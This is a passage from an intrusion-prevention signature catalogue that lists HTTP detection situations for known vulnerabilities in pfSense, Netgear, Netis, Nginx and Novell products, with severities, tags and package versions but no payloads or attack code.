Tags: Any Operating System, Any Hardware, PfSense, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1665-5242
Last changed: sgpkg-ips-1665-5242
Vulnerability: Netgate-Pfsense-Cross-Site-Scripting-CVE-2023-42325
Description:
Back to top

HTTP_CRL-Netgate-Pfsense-Diag_packet_capture.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in Netgate pfSense detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PfSense, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1668-5242
Last changed: sgpkg-ips-1668-5242
Vulnerability: Netgate-Pfsense-Diag_packet_capture.php-Command-Injection
Description:
Back to top

HTTP_CRL-Netgate-Pfsense-Diag_Routes-Command-Injection

About this situation: An attempt to exploit a vulnerability in Netgate pfSense CE detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PfSense, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1443-5242
Last changed: sgpkg-ips-1443-5242
Vulnerability: Netgate-Pfsense-Diag_Routes-Command-Injection
Description:
Back to top

HTTP_CRL-Netgate-Pfsense-Firewall_alias.php-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Netgate pfSense CE detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Netgate pfSense, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1570-5242
Last changed: sgpkg-ips-1570-5242
Vulnerability: Netgate-Pfsense-Firewall_alias.php-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Netgate-Pfsense-Haproxy_listeners_Edit.php-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Netgate pfSense detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PfSense, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1173-5242
Last changed: sgpkg-ips-1173-5242
Vulnerability: Netgate-Pfsense-Haproxy_listeners_Edit.php-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Netgate-Pfsense-Services_wol_Edit.php-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Netgate pfSense detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PfSense, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1346-5242
Last changed: sgpkg-ips-1346-5242
Vulnerability: Netgate-Pfsense-Services_wol_Edit.php-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Netgate-Pfsense-Status-Command-Injection

About this situation: An attempt to exploit a vulnerability in PfSense detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PfSense, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1520-5242
Last changed: sgpkg-ips-1520-5242
Vulnerability: Netgate-Pfsense-Status-Command-Injection
Description:
Back to top

HTTP_CRL-Netgate-Pfsense-Stored-Cross-Site-Scripting-CVE-2024-46538

About this situation: An attempt to exploit a vulnerability in Netgate pfSense detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PfSense, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1818-5242
Last changed: sgpkg-ips-1818-5242
Vulnerability: Netgate-Pfsense-Stored-Cross-Site-Scripting-CVE-2024-46538
Description:
Back to top

HTTP_CRL-Netgate-Pfsense-System_Advanced_misc.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in Netgate pfSense detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PfSense, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1123-5242
Last changed: sgpkg-ips-1123-5242
Vulnerability: Netgate-Pfsense-System_Advanced_misc.php-Command-Injection
Description:
Back to top

HTTP_CRL-NetGear-DGN1000-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Netgear DGN1000 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1203-5242
Vulnerability: NetGear-DGN1000-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-NetGear-DGN2200-Remote-Command-Execution-CVE-2017-6077

About this situation: An attempt to exploit a vulnerability in Netgear DGN2200 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1443-5242
Last changed: sgpkg-ips-1445-5242
Vulnerability: NetGear-DGN2200-Remote-Command-Execution-CVE-2017-6077
Description:
Back to top

HTTP_CRL-NetGear-NMS300-Configfilecontroller-Addconfigfile-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Netgear ProSAFE NMS300 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear NMS300, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1348-5242
Last changed: sgpkg-ips-1348-5242
Vulnerability: NetGear-NMS300-Configfilecontroller-Addconfigfile-Arbitrary-File-Deletion
Description:
Back to top

HTTP_CRL-NetGear-NMS300-Configimagecontroller-Addconfigfile-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in NetGear ProSAFE NMS300 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear NMS300, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1866-5242
Vulnerability: NetGear-NMS300-Management-System-Arbitrary-File-Read-CVE-2016-1525
NetGear-NMS300-Configimagecontroller-Addconfigfile-Arbitrary-File-Deletion
Description:
Back to top

HTTP_CRL-NetGear-Orbi-Router-Rbr750-Command-Execution-CVE-2022-37337

About this situation: An attempt to exploit a vulnerability in NetGear Orbi Router RBR750 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear Orbi, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1570-5242
Last changed: sgpkg-ips-1570-5242
Vulnerability: NetGear-Orbi-Router-Rbr750-Command-Execution-CVE-2022-37337
Description:
Back to top

HTTP_CRL-NetGear-ProSafe-NMS300-Clearalertbyids-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Netgear ProSAFE NMS300 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear NMS300, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1662-5242
Last changed: sgpkg-ips-1662-5242
Vulnerability: NetGear-ProSafe-NMS300-Clearalertbyids-SQL-Injection
Description:
Back to top

HTTP_CRL-NetGear-ProSafe-NMS300-CVE-2023-38095-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Netgear ProSAFE NMS300 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear NMS300, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: NetGear-ProSafe-NMS300-CVE-2023-38095-Arbitrary-File-Upload
Description:
Back to top

HTTP_CRL-NetGear-ProSafe-NMS300-Getnodesbytopologymapsearch-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Netgear ProSAFE NMS300 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear NMS300, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1618-5242
Last changed: sgpkg-ips-1618-5242
Vulnerability: NetGear-ProSafe-NMS300-Getnodesbytopologymapsearch-SQL-Injection
Description:
Back to top

HTTP_CRL-NetGear-ProSafe-NMS300-Mibcontroller-Realname-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in NetGear ProSAFE NMS300 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear NMS300, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Vulnerability: NetGear-ProSafe-NMS300-Mibcontroller-Realname-Directory-Traversal
Description:
Back to top

HTTP_CRL-NetGear-ProSafe-NMS300-Reporttemplatecontroller-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in NetGear ProSAFE NMS300 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear NMS300, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Vulnerability: NetGear-ProSafe-NMS300-Reporttemplatecontroller-Arbitrary-File-Deletion
Description:
Back to top

HTTP_CRL-NetGear-ProSafe-NMS300-Savenodelabel-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Netgear ProSAFE NMS300 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear NMS300, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1689-5242
Last changed: sgpkg-ips-1689-5242
Vulnerability: NetGear-ProSafe-NMS300-Savenodelabel-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-NetGear-ProSafe-NMS300-Settingconfigcontroller-Command-Injection

About this situation: An attempt to exploit a vulnerability in NetGear ProSAFE NMS300 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear NMS300, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1341-5242
Vulnerability: NetGear-ProSafe-NMS300-Settingconfigcontroller-Command-Injection
Description:
Back to top

HTTP_CRL-NetGear-ProSafe-NMS300-Uploadservlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Netgear ProSAFE NMS300 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear NMS300, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1777-5242
Last changed: sgpkg-ips-1777-5242
Vulnerability: NetGear-ProSafe-NMS300-Uploadservlet-Directory-Traversal
Description:
Back to top

HTTP_CRL-NetGear-ProSafe-NMS300-Uploadservlet-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in Netgear ProSAFE NMS300 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear NMS300, CVE2023, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1641-5242
Last changed: sgpkg-ips-1737-5242
Vulnerability: NetGear-ProSafe-NMS300-Uploadservlet-Unrestricted-File-Upload
NetGear-ProSafe-NMS300-CVE-2024-5247-Uploadservlet-Unrestricted-File-Upload
Description:
Back to top

HTTP_CRL-NetGear-ProSafe-Plus-Improper-Access-Control-CVE-2020-26919

About this situation: An attempt to exploit a vulnerability in NetGear ProSAFE detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1403-5242
Last changed: sgpkg-ips-1403-5242
Vulnerability: NetGear-ProSafe-Plus-Improper-Access-Control-CVE-2020-26919
Description:
Back to top

HTTP_CRL-NetGear-RAX43-Command-Injection-CVE-2021-20167

About this situation: An attempt to exploit a vulnerability in NetGear RAX43 router detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Vulnerability: NetGear-RAX43-Command-Injection-CVE-2021-20167
Description:
Back to top

HTTP_CRL-NetGear-Wireless-Access-Point-Remote-Code-Execution-CVE-2016-1555

About this situation: An attempt to exploit a vulnerability in NetGear detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1482-5242
Vulnerability: NetGear-Wireless-Access-Point-Remote-Code-Execution-CVE-2016-1555
Description:
Back to top

HTTP_CRL-NetGear-WNR2000v5-Remote-Code-Execution-CVE-2016-10174

About this situation: An attempt to exploit a vulnerability in NetGear WNR2000v5 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1485-5242
Last changed: sgpkg-ips-1485-5242
Vulnerability: HTTP_CRL-NetGear-WNR2000v5-Remote-Code-Execution-CVE-2016-10174
Description:
Back to top

HTTP_CRL-Netis-Router-MW5360-Unauthenticated-RCE

About this situation: An attempt to exploit a vulnerability in the Netis MW5360 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Netis, CVE2024, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1748-5242
Last changed: sgpkg-ips-1748-5242
Vulnerability: Netis-Router-MW5360-Unauthenticated-RCE
Description:
Back to top

HTTP_CRL-Netis-Router-Unauthenticated-Password-Change

About this situation: An attempt to exploit a vulnerability in Netis routers
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Netis, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Vulnerability: Netis-Router-Unauthenticated-Password-Change
Description:
Back to top

HTTP_CRL-Netis-WF2419-Remote-Code-Execution-CVE-2019-19356

About this situation: An attempt to exploit a vulnerability in Netis WF2419 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Netis, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: Netis-WF2419-Remote-Code-Execution-CVE-2019-19356
Description:
Back to top

HTTP_CRL-Netlink-GPON-Router-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Netlink GPON Router 1.0.11 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Netlink, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1445-5242
Last changed: sgpkg-ips-1818-5242
Vulnerability: Netlink-GPON-Router-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Nexus-Repository-Manager-Java-EL-Injection

About this situation: An attempt to exploit a vulnerability in Nexus Repository Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Sonatype Nexus Repository Manager, CVE2020, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1837-5242
Vulnerability: Nexus-Repository-Manager-Java-EL-Injection
Description:
Back to top

HTTP_CRL-Nginx-Location-NTFS-Extended-Attributes-Security-Bypass

About this situation: An attempt to exploit a vulnerability in nginx HTTP Server for Windows detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, nginx, CVE2011, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-867-5242
Vulnerability: Nginx-Location-NTFS-Extended-Attributes-Security-Bypass
Description:
Back to top

HTTP_CRL-Nginx-Remote-Source-Code-Disclosure

About this situation: An attempt to exploit an Nginx Remote Source Code Disclosure vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, nginx, CVE2010, Windows not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-721-5211
Last changed: sgpkg-ips-721-5211
Vulnerability: Nginx-Remote-Source-Code-Disclosure
Description:
Back to top

HTTP_CRL-Nitro-Stealer-Infection-Traffic

About this situation: Nitro Stealer infection traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1396-5242
Vulnerability: Nitro-Stealer-Infection-Traffic
Description:
Back to top

HTTP_CRL-NodCMS-Edit_Lang_File-PHP-Code-Execution

About this situation: An attempt to exploit a vulnerability in NodCMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NodCMS, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-824-5242
Last changed: sgpkg-ips-824-5242
Vulnerability: NodCMS-Edit_Lang_File-PHP-Code-Execution
Description:
Back to top

HTTP_CRL-Novell-eDirectory-iMonitor-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Novell eDirectory detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Novell eDirectory, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Novell-eDirectory-iMonitor-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Novell-File-Reporter-Arbitrary-File-Delete

About this situation: An attempt to exploit a Novell File Reporter Arbitrary File Delete vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Novell File Reporter, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-1272-5242
Vulnerability: Novell-File-Reporter-Arbitrary-File-Delete
Description:
Back to top

HTTP_CRL-Novell-File-Reporter-FSFUI-Record-Directory-Traversal

About this situation: An attempt to exploit a Novell File Reporter FSFUI Record Directory Traversal vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Novell File Reporter, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-782-5211
Vulnerability: Novell-File-Reporter-FSFUI-Record-Directory-Traversal
Description:
Back to top

HTTP_CRL-Novell-Groupwise-Messenger-Nmma.exe-Createsearch-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Novell GroupWise Messenger detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Novell GroupWise Messenger, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Vulnerability: Novell-Groupwise-Messenger-Nmma.exe-Createsearch-Memory-Corruption
Description:
Back to top

HTTP_CRL-Novell-iManager-Class-Name-Remote-Buffer-Overflow

About this situation: An attempt to exploit a buffe overflow vulnerability in Novell iManager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Novell iManager, CVE2010, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-321-4219
Last changed: sgpkg-ips-1013-5242
Vulnerability: Novell-iManager-Class-Name-Remote-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Novell-iManager-Create-Attribute-EnteredAttrName-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell iManager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Novell iManager, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-449-4219
Last changed: sgpkg-ips-1758-5242
Vulnerability: Novell-iManager-Create-Attribute-EnteredAttrName-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Novell-iManager-eDirectory-Plugin-Schema-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell iManager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Novell iManager, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-325-4219
Vulnerability: Novell-iManager-eDirectory-Plugin-Schema-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Novell-iManager-Tree-Name-Denial-Of-Service

About this situation: A denial of service exploit against Novell iManager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Novell iManager, CVE2006, CVE2010, Any Operating System not specific, Denial of Service, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-321-4219
Vulnerability: HTTP-Novell-iManager-Tomcat-POST-Request-Denial-Of-Service
HTTP-Novell-iManager-Tree-Name-Denial-Of-Service
Description:
Back to top

HTTP_CRL-Novell-ZENworks-Asset-Management-Web-Console-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Novell ZENworks Asset Management detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Asset Management, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-487-5211
Last changed: sgpkg-ips-512-5211
Vulnerability: Novell-ZENworks-Asset-Management-Web-Console-Information-Disclosure
Description:
Back to top

HTTP_CRL-Novell-ZENworks-Configuration-Management-DirectoryViewer-Information-Disclosure

About this situation: Call for a vulnerable method in Novell ZENworks Configuration Management detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-650-5211
Vulnerability: Novell-ZENworks-Configuration-Management-DirectoryViewer-Information-Disclosure
Description:
Back to top

HTTP_CRL-Novell-ZENworks-Configuration-Management-FileViewer-Information-Disclosure

About this situation: Call for a vulnerable method in Novell ZENworks Configuration Management detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-650-5211
Vulnerability: Novell-ZENworks-Configuration-Management-FileViewer-Information-Disclosure
Description:
Back to top

HTTP_CRL-Novell-ZENworks-Configuration-Management-Getstoredresult-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Novell ZENworks Configuration Management detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-644-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Novell-ZENworks-Configuration-Management-Getstoredresult-SQL-Injection
Description:
Back to top

HTTP_CRL-Novell-ZENworks-Configuration-Management-Schedule.schedulequery-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Novell ZENworks Configuration Management detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Novell-ZENworks-Configuration-Management-Schedule.schedulequery-SQL-Injection
Description:
Back to top

HTTP_CRL-Novell-ZENworks-Configuration-Management-Session-Id-Information-Disclosure

About this situation: Use of a vulnerable functionality in Novell ZENworks Configuration Management detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-649-5211
Last changed: sgpkg-ips-649-5211
Vulnerability: Novell-ZENworks-Configuration-Management-Session-Id-Information-Disclosure
Description:
Back to top

HTTP_CRL-Novell-ZENworks-Configuration-Management-Uploadservlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Novell ZENworks Configuration Management detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-643-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Novell-ZENworks-Configuration-Management-Uploadservlet-Directory-Traversal
Description:
Back to top

HTTP_CRL-Novell-ZENworks-Configuration-Management-Uploadservlet-RCE

About this situation: An attempt to exploit a vulnerability in Novell ZENworks Configuration Management detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-521-5211
Vulnerability: Novell-ZENworks-Configuration-Management-Uploadservlet-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Novell-ZENworks-Mobile-Management-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Novell ZENworks Mobile Management detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Mobile Management, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-681-5211
Last changed: sgpkg-ips-1607-5242
Vulnerability: Novell-ZENworks-Mobile-Management-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Novell-ZENworks-Mobile-Management-Dusap.php-Code-Execution

About this situation: An attempt to exploit a vulnerability in Novell ZENworks Mobile Management detected
Context: HTTP Normalized Request-Line
Severity: 7
